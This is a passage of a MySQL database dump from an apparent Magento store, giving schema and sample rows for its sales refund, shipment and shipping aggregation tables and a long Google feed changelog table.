  `refunded` decimal(20,4) DEFAULT NULL COMMENT 'Refunded',
  `online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Online Refunded',
  `offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Offline Refunded'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Refunded Aggregated';

--
-- Dumping data for table `sales_refunded_aggregated`
--

INSERT INTO `sales_refunded_aggregated` (`id`, `period`, `store_id`, `order_status`, `orders_count`, `refunded`, `online_refunded`, `offline_refunded`) VALUES
(1, '2020-08-08', 1, 'closed', 1, 39.6400, NULL, 39.6400),
(2, '2020-08-08', 0, 'closed', 1, 39.6400, NULL, 39.6400);

-- --------------------------------------------------------

--
-- Table structure for table `sales_refunded_aggregated_order`
--

CREATE TABLE `sales_refunded_aggregated_order` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `refunded` decimal(20,4) DEFAULT NULL COMMENT 'Refunded',
  `online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Online Refunded',
  `offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Offline Refunded'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Refunded Aggregated Order';

--
-- Dumping data for table `sales_refunded_aggregated_order`
--

INSERT INTO `sales_refunded_aggregated_order` (`id`, `period`, `store_id`, `order_status`, `orders_count`, `refunded`, `online_refunded`, `offline_refunded`) VALUES
(1, '2020-08-08', 1, 'closed', 1, 39.6400, NULL, 39.6400),
(2, '2020-08-08', 0, 'closed', 1, 39.6400, NULL, 39.6400);

-- --------------------------------------------------------

--
-- Table structure for table `sales_sequence_meta`
--

CREATE TABLE `sales_sequence_meta` (
  `meta_id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `entity_type` varchar(32) NOT NULL COMMENT 'Prefix',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `sequence_table` varchar(64) NOT NULL COMMENT 'table for sequence'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='sales_sequence_meta';

--
-- Dumping data for table `sales_sequence_meta`
--

INSERT INTO `sales_sequence_meta` (`meta_id`, `entity_type`, `store_id`, `sequence_table`) VALUES
(1, 'order', 0, 'sequence_order_0'),
(2, 'invoice', 0, 'sequence_invoice_0'),
(3, 'creditmemo', 0, 'sequence_creditmemo_0'),
(4, 'shipment', 0, 'sequence_shipment_0'),
(5, 'order', 1, 'sequence_order_1'),
(6, 'invoice', 1, 'sequence_invoice_1'),
(7, 'creditmemo', 1, 'sequence_creditmemo_1'),
(8, 'shipment', 1, 'sequence_shipment_1');

-- --------------------------------------------------------

--
-- Table structure for table `sales_sequence_profile`
--

CREATE TABLE `sales_sequence_profile` (
  `profile_id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `meta_id` int(10) UNSIGNED NOT NULL COMMENT 'Meta_id',
  `prefix` varchar(32) DEFAULT NULL COMMENT 'Prefix',
  `suffix` varchar(32) DEFAULT NULL COMMENT 'Suffix',
  `start_value` int(10) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Start value for sequence',
  `step` int(10) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Step for sequence',
  `max_value` int(10) UNSIGNED NOT NULL COMMENT 'MaxValue for sequence',
  `warning_value` int(10) UNSIGNED NOT NULL COMMENT 'WarningValue for sequence',
  `is_active` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'isActive flag'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='sales_sequence_profile';

--
-- Dumping data for table `sales_sequence_profile`
--

INSERT INTO `sales_sequence_profile` (`profile_id`, `meta_id`, `prefix`, `suffix`, `start_value`, `step`, `max_value`, `warning_value`, `is_active`) VALUES
(1, 1, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(2, 2, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(3, 3, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(4, 4, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(5, 5, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(6, 6, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(7, 7, NULL, NULL, 1, 1, 4294967295, 4294966295, 1),
(8, 8, NULL, NULL, 1, 1, 4294967295, 4294966295, 1);

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipment`
--

CREATE TABLE `sales_shipment` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `total_weight` decimal(12,4) DEFAULT NULL COMMENT 'Total Weight',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `email_sent` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Email Sent',
  `send_email` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Send Email',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `customer_id` int(11) DEFAULT NULL COMMENT 'Customer ID',
  `shipping_address_id` int(11) DEFAULT NULL COMMENT 'Shipping Address ID',
  `billing_address_id` int(11) DEFAULT NULL COMMENT 'Billing Address ID',
  `shipment_status` int(11) DEFAULT NULL COMMENT 'Shipment Status',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `packages` text DEFAULT NULL COMMENT 'Packed Products in Packages',
  `shipping_label` mediumblob DEFAULT NULL COMMENT 'Shipping Label Content',
  `customer_note` text DEFAULT NULL COMMENT 'Customer Note',
  `customer_note_notify` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Customer Note Notify'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment';

--
-- Dumping data for table `sales_shipment`
--

INSERT INTO `sales_shipment` (`entity_id`, `store_id`, `total_weight`, `total_qty`, `email_sent`, `send_email`, `order_id`, `customer_id`, `shipping_address_id`, `billing_address_id`, `shipment_status`, `increment_id`, `created_at`, `updated_at`, `packages`, `shipping_label`, `customer_note`, `customer_note_notify`) VALUES
(1, 1, NULL, 1.0000, NULL, NULL, 1, 1, 1, 2, NULL, '000000001', '2020-08-08 01:45:20', '2020-08-08 01:45:20', '[]', NULL, NULL, NULL),
(2, 1, NULL, 1.0000, NULL, NULL, 2, 1, 3, 4, NULL, '000000002', '2020-08-08 01:45:26', '2020-08-08 01:45:26', '[]', NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipment_comment`
--

CREATE TABLE `sales_shipment_comment` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `is_customer_notified` int(11) DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `comment` text DEFAULT NULL COMMENT 'Comment',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Comment';

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipment_grid`
--

CREATE TABLE `sales_shipment_grid` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_increment_id` varchar(32) NOT NULL COMMENT 'Order Increment ID',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `order_created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Order Increment ID',
  `customer_name` varchar(128) NOT NULL COMMENT 'Customer Name',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `shipment_status` int(11) DEFAULT NULL COMMENT 'Shipment Status',
  `order_status` varchar(32) DEFAULT NULL COMMENT 'Order',
  `billing_address` varchar(255) DEFAULT NULL COMMENT 'Billing Address',
  `shipping_address` varchar(255) DEFAULT NULL COMMENT 'Shipping Address',
  `billing_name` varchar(128) DEFAULT NULL COMMENT 'Billing Name',
  `shipping_name` varchar(128) DEFAULT NULL COMMENT 'Shipping Name',
  `customer_email` varchar(128) DEFAULT NULL COMMENT 'Customer Email',
  `customer_group_id` int(11) DEFAULT NULL,
  `payment_method` varchar(32) DEFAULT NULL COMMENT 'Payment Method',
  `shipping_information` varchar(255) DEFAULT NULL COMMENT 'Shipping Method Name',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Grid';

--
-- Dumping data for table `sales_shipment_grid`
--

INSERT INTO `sales_shipment_grid` (`entity_id`, `increment_id`, `store_id`, `order_increment_id`, `order_id`, `order_created_at`, `customer_name`, `total_qty`, `shipment_status`, `order_status`, `billing_address`, `shipping_address`, `billing_name`, `shipping_name`, `customer_email`, `customer_group_id`, `payment_method`, `shipping_information`, `created_at`, `updated_at`) VALUES
(1, '000000001', 1, '000000001', 1, '2020-08-08 01:45:18', 'Veronica Costello', 1.0000, NULL, 'processing', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Veronica Costello', 'Veronica Costello', 'roni_cost@example.com', 1, 'checkmo', 'Flat Rate - Fixed', '2020-08-08 01:45:20', '2020-08-08 01:45:20'),
(2, '000000002', 1, '000000002', 2, '2020-08-08 01:45:23', 'Veronica Costello', 1.0000, NULL, 'processing', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Veronica Costello', 'Veronica Costello', 'roni_cost@example.com', 1, 'checkmo', 'Flat Rate - Fixed', '2020-08-08 01:45:26', '2020-08-08 01:45:26');

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipment_item`
--

CREATE TABLE `sales_shipment_item` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `row_total` decimal(20,4) DEFAULT NULL COMMENT 'Row Total',
  `price` decimal(20,4) DEFAULT NULL COMMENT 'Price',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `product_id` int(11) DEFAULT NULL COMMENT 'Product ID',
  `order_item_id` int(11) DEFAULT NULL COMMENT 'Order Item ID',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `description` text DEFAULT NULL COMMENT 'Description',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Item';

--
-- Dumping data for table `sales_shipment_item`
--

INSERT INTO `sales_shipment_item` (`entity_id`, `parent_id`, `row_total`, `price`, `weight`, `qty`, `product_id`, `order_item_id`, `additional_data`, `description`, `name`, `sku`) VALUES
(1, 1, NULL, 29.0000, 1.0000, 1.0000, 1441, 1, NULL, NULL, 'Iris Workout Top', 'WS03-XS-Red'),
(2, 2, NULL, 32.0000, 1.0000, 1.0000, 1505, 2, NULL, NULL, 'Minerva LumaTech&trade; V-Tee', 'WS08-XS-Blue');

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipment_track`
--

CREATE TABLE `sales_shipment_track` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `track_number` text DEFAULT NULL COMMENT 'Number',
  `description` text DEFAULT NULL COMMENT 'Description',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `carrier_code` varchar(32) DEFAULT NULL COMMENT 'Carrier Code',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Shipment Track';

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipping_aggregated`
--

CREATE TABLE `sales_shipping_aggregated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `total_shipping` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping',
  `total_shipping_actual` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping Actual'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Shipping Aggregated';

--
-- Dumping data for table `sales_shipping_aggregated`
--

INSERT INTO `sales_shipping_aggregated` (`id`, `period`, `store_id`, `order_status`, `shipping_description`, `orders_count`, `total_shipping`, `total_shipping_actual`) VALUES
(1, '2020-08-08', 1, 'closed', 'Flat Rate - Fixed', 1, 5.0000, 0.0000),
(2, '2020-08-08', 1, 'processing', 'Flat Rate - Fixed', 1, 5.0000, 5.0000),
(4, '2020-08-08', 0, 'closed', 'Flat Rate - Fixed', 1, 5.0000, 0.0000),
(5, '2020-08-08', 0, 'processing', 'Flat Rate - Fixed', 1, 5.0000, 5.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_shipping_aggregated_order`
--

CREATE TABLE `sales_shipping_aggregated_order` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `total_shipping` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping',
  `total_shipping_actual` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping Actual'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Shipping Aggregated Order';

--
-- Dumping data for table `sales_shipping_aggregated_order`
--

INSERT INTO `sales_shipping_aggregated_order` (`id`, `period`, `store_id`, `order_status`, `shipping_description`, `orders_count`, `total_shipping`, `total_shipping_actual`) VALUES
(1, '2020-08-08', 1, 'closed', 'Flat Rate - Fixed', 1, 5.0000, 0.0000),
(2, '2020-08-08', 1, 'processing', 'Flat Rate - Fixed', 1, 5.0000, 5.0000),
(4, '2020-08-08', 0, 'closed', 'Flat Rate - Fixed', 1, 5.0000, 0.0000),
(5, '2020-08-08', 0, 'processing', 'Flat Rate - Fixed', 1, 5.0000, 5.0000);

-- --------------------------------------------------------

--
-- Table structure for table `scconnector_google_feed_cl`
--

CREATE TABLE `scconnector_google_feed_cl` (
  `version_id` int(10) UNSIGNED NOT NULL COMMENT 'Version ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='scconnector_google_feed_cl';

--
-- Dumping data for table `scconnector_google_feed_cl`
--

INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(90, 4),
(91, 4),
(92, 4),
(93, 4),
(94, 4),
(95, 4),
(96, 4),
(97, 4),
(98, 4),
(99, 4),
(100, 4),
(101, 4),
(102, 4),
(103, 4),
(104, 4),
(105, 4),
(106, 4),
(107, 4),
(108, 4),
(109, 4),
(110, 4),
(111, 4),
(112, 4),
(113, 4),
(114, 4),
(115, 4),
(116, 4),
(117, 4),
(118, 4),
(119, 4),
(120, 4),
(121, 4),
(150, 6),
(151, 6),
(152, 6),
(153, 6),
(154, 6),
(155, 6),
(156, 6),
(157, 6),
(158, 6),
(159, 6),
(160, 6),
(161, 6),
(162, 6),
(163, 6),
(164, 6),
(165, 6),
(166, 6),
(167, 6),
(168, 6),
(169, 6),
(170, 6),
(171, 6),
(172, 6),
(173, 6),
(174, 6),
(175, 4),
(176, 4),
(177, 4),
(178, 4),
(179, 4),
(180, 4),
(181, 7),
(182, 7),
(183, 7),
(184, 7),
(185, 7),
(186, 7),
(187, 7),
(188, 7),
(189, 7),
(190, 7),
(191, 7),
(192, 7),
(193, 7),
(194, 7),
(195, 7),
(196, 7),
(197, 7),
(198, 7),
(199, 7),
(200, 7),
(201, 7),
(202, 7),
(203, 7),
(204, 7),
(205, 7),
(206, 7),
(207, 7),
(208, 7),
(209, 7),
(210, 7),
(211, 7),
(212, 7),
(213, 7),
(214, 6),
(215, 6),
(216, 6),
(217, 8),
(218, 8),
(219, 8),
(220, 8),
(221, 8),
(222, 8),
(223, 8),
(224, 8),
(225, 8),
(226, 8),
(227, 8),
(228, 8),
(229, 9),
(230, 9),
(231, 9),
(232, 9),
(233, 9),
(234, 9),
(235, 9),
(236, 9),
(237, 9),
(238, 9),
(239, 9),
(240, 9),
(241, 9),
(242, 9),
(243, 9),
(244, 9),
(245, 9),
(246, 9),
(247, 9),
(248, 9),
(249, 9),
(250, 9),
(251, 9),
(252, 9),
(253, 9),
(254, 10),
(255, 10),
(256, 10),
(257, 10),
(258, 10),
(259, 10),
(260, 10),
(261, 10),
(262, 10),
(263, 10),
(264, 10),
(265, 10),
(266, 10),
(267, 10),
(268, 10),
(269, 10),
(270, 10),
(271, 10),
(272, 10),
(273, 10),
(274, 10),
(275, 11),
(276, 11),
(277, 11),
(278, 11),
(279, 11),
(280, 11),
(281, 11),
(282, 11),
(283, 11),
(284, 11),
(285, 11),
(286, 11),
(287, 11),
(288, 11),
(289, 11),
(290, 11),
(291, 11),
(292, 11),
(293, 11),
(294, 11),
(295, 11),
(296, 12),
(297, 12),
(298, 12),
(299, 12),
(300, 12),
(301, 12),
(302, 12),
(303, 12),
(304, 12),
(305, 12),
(306, 12),
(307, 12),
(308, 12),
(309, 12),
(310, 12),
(311, 12),
(312, 12),
(313, 12),
(314, 12),
(315, 12),
(316, 12),
(317, 13),
(318, 13),
(319, 13),
(320, 13),
(321, 13),
(322, 13),
(323, 13),
(324, 13),
(325, 13),
(326, 13),
(327, 13),
(328, 13),
(329, 13),
(330, 13),
(331, 13),
(332, 13),
(333, 13),
(334, 13),
(335, 13),
(336, 13),
(337, 13),
(338, 14),
(339, 14),
(340, 14),
(341, 14),
(342, 14),
(343, 14),
(344, 14),
(345, 14),
(346, 14),
(347, 14),
(348, 14),
(349, 14),
(350, 14),
(351, 14),
(352, 14),
(353, 14),
(354, 14),
(355, 14),
(356, 14),
(357, 14),
(358, 15),
(359, 15),
(360, 15),
(361, 15),
(362, 15),
(363, 15),
(364, 15),
(365, 15),
(366, 15),
(367, 15),
(368, 15),
(369, 15),
(370, 15),
(371, 15),
(372, 15),
(373, 15),
(374, 15),
(375, 15),
(376, 15),
(377, 15),
(378, 16),
(379, 16),
(380, 16),
(381, 16),
(382, 16),
(383, 16),
(384, 16),
(385, 16),
(386, 16),
(387, 16),
(388, 16),
(389, 16),
(390, 16),
(391, 16),
(392, 16),
(393, 16),
(394, 16),
(395, 16),
(396, 16),
(397, 16),
(398, 17),
(399, 17),
(400, 17),
(401, 17),
(402, 17),
(403, 17),
(404, 17),
(405, 17),
(406, 17),
(407, 17),
(408, 17),
(409, 17),
(410, 17),
(411, 17),
(412, 17),
(413, 17),
(414, 17),
(415, 17),
(416, 17),
(417, 17),
(418, 17),
(419, 17),
(420, 17),
(421, 18),
(422, 18),
(423, 18),
(424, 18),
(425, 18),
(426, 18),
(427, 18),
(428, 18),
(429, 18),
(430, 18),
(431, 18),
(432, 18),
(433, 18),
(434, 18),
(435, 18),
(436, 18),
(437, 18),
(438, 18),
(439, 18),
(440, 18),
(441, 18),
(442, 18),
(443, 18),
(444, 18),
(445, 18),
(446, 19),
(447, 19),
(448, 19),
(449, 19),
(450, 19),
(451, 19),
(452, 19),
(453, 19),
(454, 19),
(455, 19),
(456, 19),
(457, 19),
(458, 19),
(459, 19),
(460, 19),
(461, 19),
(462, 19),
(463, 19),
(464, 19),
(465, 19),
(466, 20),
(467, 20),
(468, 20),
(469, 20),
(470, 20),
(471, 20),
(472, 20),
(473, 20),
(474, 20),
(475, 20),
(476, 20),
(477, 20),
(478, 20),
(479, 20),
(480, 20),
(481, 20),
(482, 20),
(483, 20),
(484, 20),
(485, 20),
(486, 20),
(487, 21),
(488, 21),
(489, 21),
(490, 21),
(491, 21),
(492, 21),
(493, 21),
(494, 21),
(495, 21),
(496, 21),
(497, 21),
(498, 21),
(499, 21),
(500, 21),
(501, 21),
(502, 21),
(503, 21),
(504, 21),
(505, 21),
(506, 21),
(507, 21),
(508, 22),
(509, 22),
(510, 22),
(511, 22),
(512, 22),
(513, 22),
(514, 22),
(515, 22),
(516, 22),
(517, 22),
(518, 22),
(519, 22),
(520, 22),
(521, 22),
(522, 22),
(523, 22),
(524, 22),
(525, 23),
(526, 23),
(527, 23),
(528, 23),
(529, 23),
(530, 23),
(531, 23),
(532, 23),
(533, 23),
(534, 23),
(535, 23),
(536, 23),
(537, 23),
(538, 23),
(539, 23),
(540, 23),
(541, 23),
(542, 23),
(543, 23),
(544, 23),
(545, 23),
(546, 23),
(547, 23),
(548, 23),
(549, 24),
(550, 24),
(551, 24),
(552, 24),
(553, 24),
(554, 24),
(555, 24),
(556, 24),
(557, 24),
(558, 24),
(559, 24),
(560, 24),
(561, 24),
(562, 24),
(563, 24),
(564, 24),
(565, 24),
(566, 24),
(567, 24),
(568, 25),
(569, 25),
(570, 25),
(571, 25),
(572, 25),
(573, 25),
(574, 25),
(575, 25),
(576, 25),
(577, 25),
(578, 25),
(579, 25),
(580, 25),
(581, 25),
(582, 25),
(583, 25),
(584, 25),
(585, 25),
(586, 25),
(587, 26),
(588, 26),
(589, 26),
(590, 26),
(591, 26),
(592, 26),
(593, 26),
(594, 26),
(595, 26),
(596, 26),
(597, 26),
(598, 26),
(599, 26),
(600, 26),
(601, 26),
(602, 26),
(603, 26),
(604, 26),
(605, 26),
(606, 26),
(607, 26),
(608, 27),
(609, 27),
(610, 27),
(611, 27),
(612, 27),
(613, 27),
(614, 27),
(615, 27),
(616, 27),
(617, 27),
(618, 27),
(619, 27),
(620, 27),
(621, 27),
(622, 27),
(623, 27),
(624, 27),
(625, 27),
(626, 27),
(627, 28),
(628, 28),
(629, 28),
(630, 28),
(631, 28),
(632, 28),
(633, 28),
(634, 28),
(635, 28),
(636, 28),
(637, 28),
(638, 28),
(639, 28),
(640, 28),
(641, 28),
(642, 28),
(643, 28),
(644, 28),
(645, 28),
(646, 29),
(647, 29),
(648, 29),
(649, 29),
(650, 29),
(651, 29),
(652, 29),
(653, 29),
(654, 29),
(655, 29),
(656, 29),
(657, 29),
(658, 29),
(659, 29),
(660, 29),
(661, 29),
(662, 29),
(663, 29),
(664, 29),
(665, 30),
(666, 30),
(667, 30),
(668, 30),
(669, 30),
(670, 30),
(671, 30),
(672, 30),
(673, 30),
(674, 30),
(675, 30),
(676, 30),
(677, 30),
(678, 30),
(679, 30),
(680, 30),
(681, 30),
(682, 30),
(683, 30),
(684, 31),
(685, 31),
(686, 31),
(687, 31),
(688, 31),
(689, 31),
(690, 31),
(691, 31),
(692, 31),
(693, 31),
(694, 31),
(695, 31),
(696, 31),
(697, 31),
(698, 31),
(699, 31),
(700, 31),
(701, 31),
(702, 31),
(703, 31),
(704, 31),
(705, 32),
(706, 32),
(707, 32),
(708, 32),
(709, 32),
(710, 32),
(711, 32),
(712, 32),
(713, 32),
(714, 32),
(715, 32),
(716, 32),
(717, 32),
(718, 32),
(719, 32),
(720, 32),
(721, 32),
(722, 32),
(723, 32),
(724, 32),
(725, 32),
(726, 33),
(727, 33),
(728, 33),
(729, 33),
(730, 33),
(731, 33),
(732, 33),
(733, 33),
(734, 33),
(735, 33),
(736, 33),
(737, 33),
(738, 33),
(739, 33),
(740, 33),
(741, 33),
(742, 33),
(743, 33),
(744, 33),
(745, 33),
(746, 33),
(747, 34),
(748, 34),
(749, 34),
(750, 34),
(751, 34),
(752, 34),
(753, 34),
(754, 34),
(755, 34),
(756, 34),
(757, 34),
(758, 34),
(759, 34),
(760, 34),
(761, 34),
(762, 34),
(763, 34),
(764, 34),
(765, 34),
(766, 34),
(767, 34),
(768, 35),
(769, 35),
(770, 35),
(771, 35),
(772, 35),
(773, 35),
(774, 35),
(775, 35),
(776, 35),
(777, 35),
(778, 35),
(779, 35),
(780, 35),
(781, 35),
(782, 35),
(783, 35),
(784, 35),
(785, 35),
(786, 35),
(787, 35),
(788, 35),
(789, 36),
(790, 36),
(791, 36),
(792, 36),
(793, 36),
(794, 36),
(795, 36),
(796, 36),
(797, 36),
(798, 36),
(799, 36),
(800, 36),
(801, 36),
(802, 36),
(803, 36),
(804, 36),
(805, 36),
(806, 36),
(807, 36),
(808, 36),
(809, 36),
(810, 37),
(811, 37),
(812, 37),
(813, 37),
(814, 37),
(815, 37),
(816, 37),
(817, 37),
(818, 37),
(819, 37),
(820, 37),
(821, 37),
(822, 37),
(823, 37),
(824, 37),
(825, 37),
(826, 37),
(827, 37),
(828, 37),
(829, 37),
(830, 37),
(831, 38),
(832, 38),
(833, 38),
(834, 38),
(835, 38),
(836, 38),
(837, 38),
(838, 38),
(839, 38),
(840, 38),
(841, 38),
(842, 38),
(843, 38),
(844, 38),
(845, 38),
(846, 38),
(847, 38),
(848, 38),
(849, 38),
(850, 38),
(851, 38),
(852, 39),
(853, 39),
(854, 39),
(855, 39),
(856, 39),
(857, 39),
(858, 39),
(859, 39),
(860, 39),
(861, 39),
(862, 39),
(863, 39),
(864, 39),
(865, 39),
(866, 39),
(867, 39),
(868, 39),
(869, 39),
(870, 39),
(871, 39),
(872, 39),
(873, 40),
(874, 40),
(875, 40),
(876, 40),
(877, 40),
(878, 40),
(879, 40),
(880, 40),
(881, 40),
(882, 40),
(883, 40),
(884, 40),
(885, 40),
(886, 40),
(887, 40),
(888, 40),
(889, 40),
(890, 40),
(891, 40),
(892, 40),
(893, 41),
(894, 41),
(895, 41),
(896, 41),
(897, 41),
(898, 41),
(899, 41),
(900, 41),
(901, 41),
(902, 41),
(903, 41),
(904, 41),
(905, 41),
(906, 41),
(907, 41),
(908, 41),
(909, 41),
(910, 41),
(911, 41),
(912, 41),
(913, 42),
(914, 42),
(915, 42),
(916, 42),
(917, 42),
(918, 42),
(919, 42),
(920, 42),
(921, 42),
(922, 42),
(923, 42),
(924, 42),
(925, 42),
(926, 42),
(927, 42),
(928, 42),
(929, 42),
(930, 42),
(931, 42),
(932, 42),
(933, 43),
(934, 43),
(935, 43),
(936, 43),
(937, 43),
(938, 43),
(939, 43),
(940, 43),
(941, 43),
(942, 43),
(943, 43),
(944, 43),
(945, 43),
(946, 43),
(947, 43),
(948, 43),
(949, 43),
(950, 43),
(951, 43),
(952, 44),
(953, 44),
(954, 44),
(955, 44),
(956, 44),
(957, 44),
(958, 44),
(959, 44),
(960, 44),
(961, 44),
(962, 44),
(963, 44),
(964, 44),
(965, 44),
(966, 44),
(967, 44),
(968, 44),
(969, 44),
(970, 44),
(971, 45),
(972, 45),
(973, 45),
(974, 45),
(975, 45),
(976, 45),
(977, 45),
(978, 45),
(979, 45),
(980, 45),
(981, 45),
(982, 45),
(983, 45),
(984, 45),
(985, 45),
(986, 45),
(987, 45),
(988, 45),
(989, 45),
(990, 45),
(991, 46),
(992, 46),
(993, 46),
(994, 46),
(995, 46),
(996, 46),
(997, 46),
(998, 46),
(999, 46),
(1000, 46),
(1001, 46),
(1002, 46),
(1003, 46),
(1004, 46),
(1005, 46),
(1006, 46),
(1007, 46),
(1008, 46),
(1009, 46),
(1010, 46),
(1011, 47),
(1012, 47),
(1013, 47),
(1014, 47),
(1015, 47),
(1016, 47),
(1017, 47),
(1018, 47),
(1019, 47),
(1020, 47),
(1021, 47),
(1022, 47),
(1023, 47),
(1024, 47),
(1025, 47),
(1026, 47),
(1027, 47),
(1028, 47),
(1029, 47),
(1030, 47),
(1031, 48),
(1032, 48),
(1033, 48),
(1034, 48),
(1035, 48),
(1036, 48),
(1037, 48),
(1038, 48),
(1039, 48),
(1040, 48),
(1041, 48),
(1042, 48),
(1043, 48),
(1044, 48),
(1045, 48),
(1046, 48),
(1047, 48),
(1048, 48),
(1049, 48),
(1050, 48),
(1051, 48),
(1052, 48),
(1053, 49),
(1054, 49),
(1055, 49),
(1056, 49),
(1057, 49),
(1058, 49),
(1059, 49),
(1060, 49),
(1061, 49),
(1062, 49),
(1063, 49),
(1064, 49),
(1065, 49),
(1066, 49),
(1067, 49),
(1068, 49),
(1069, 49),
(1070, 49),
(1071, 49),
(1072, 49),
